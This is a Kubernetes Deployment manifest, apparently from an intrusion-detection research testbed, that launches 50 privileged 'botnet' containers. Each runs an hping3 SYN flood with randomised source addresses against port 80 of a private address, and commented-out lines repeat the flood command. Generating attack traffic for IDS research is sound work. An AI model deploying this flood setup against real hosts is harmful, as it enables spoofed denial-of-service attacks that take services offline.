apiVersion: apps/v1
kind: Deployment
metadata:
  name: botnet
  annotations:
    # kubernetes.io/ingress-bandwidth: 1M
    # kubernetes.io/egress-bandwidth: 1M
    # k8s.v1.cni.cncf.io/ingress-bandwidth: 1M
    # k8s.v1.cni.cncf.io/egress-bandwidth: 1M
    # k8s.v1.cni.cncf.io/networks: macvlan-dhcp-ids-sc
    # k8s.v1.cni.cncf.io/networks: macvlan-dhcp-ids-pe
    # k8s.v1.cni.cncf.io/networks: macvlan-dhcp-whx-df
    k8s.v1.cni.cncf.io/networks: macvlan-3169-mentored-ids-df
    # k8s.v1.cni.cncf.io/networks: macvlan-3169-mentored-whx-es
spec:
  selector:
    matchLabels:
      actor: botnet
  replicas: 50
  template:
    metadata:
      labels:
        actor: botnet
        type: oper
        app: botnet
      annotations:
        # k8s.v1.cni.cncf.io/networks: macvlan-dhcp-ids-sc
        # k8s.v1.cni.cncf.io/networks: macvlan-dhcp-ids-pe
        # k8s.v1.cni.cncf.io/networks: macvlan-dhcp-whx-df
        k8s.v1.cni.cncf.io/networks: macvlan-3169-mentored-ids-df
        # k8s.v1.cni.cncf.io/networks: macvlan-3169-mentored-whx-es
    spec:
      nodeName: ids-df
      containers:
      - name: bot-iot
        # image: allexmagno/iot-t50
        # image: ghcr.io/brunomeyer/iot-t50-1mb:latest
        image: ghcr.io/brunomeyer/generic-botnet
        # imagePullPolicy: "IfNotPresent"
        imagePullPolicy: "Always"
        env:
          - name: SERVER
            value: "10.1.1.103"
          - name: PROTOCOL
            value: "ICMP"
          - name: NET_INTERFACE
            value: "net1"
          - name: INGRESS_KBS
            value: "1024"
          - name: EGRESS_KBS
            value: "10240"
        command: ["entry.sh"]
        # command: ["tail", "-f", "/dev/null"]
        # command: ["hping3", "-I", "net1", "--rand-source", "--flood", "-p", "80", "$SERVER"]
        # command: ["hping3"]
        args: ["hping3", "--rand-source", "-I", "net1", "--flood", "-p", "80"]
        securityContext:
          privileged: true
          capabilities:
            add:
              - NET_ADMIN
        resources:
          requests:
            memory: "64M"
            cpu: "0.5"
          limits:
            memory: "128M"
            cpu: "1"
      nodeSelector:
        # kubernetes.io/hostname: ids-sc
        # kubernetes.io/hostname: ids-pe
        # kubernetes.io/hostname: whx-df
        # kubernetes.io/hostname: whx-es
        kubernetes.io/hostname: ids-df


# apiVersion: v1
# kind: Pod
# metadata:
#   namespace: mentored
#   name: bot-iot-1
#   annotations:
#     k8s.v1.cni.cncf.io/networks: macvlan-dhcp-ids-sc
#     # k8s.v1.cni.cncf.io/networks: '[
#     #         { "name": "macvlan-static-ids-sc",
#     #           "ips": [ "10.1.1.7/24" ],
#     #           "gateway": [ "10.1.1.3" ]
#     #         }]'
#   labels:
#     app: bot-iot-1
#     type: oper
# spec:
#   nodeName: ids-sc
#   restartPolicy: OnFailure
#   containers:
#   - name: bot-iot-1
#     image: allexmagno/iot-t50
#     imagePullPolicy: "IfNotPresent"
#     env:
#       - name: SERVER
#         value: "10.1.1.3"
#       - name: PROTOCOL
#         value: "ICMP"
#     command: ["entry.sh"]
#     securityContext:
#       privileged: true
#   nodeSelector:
#     kubernetes.io/hostname: ids-sc
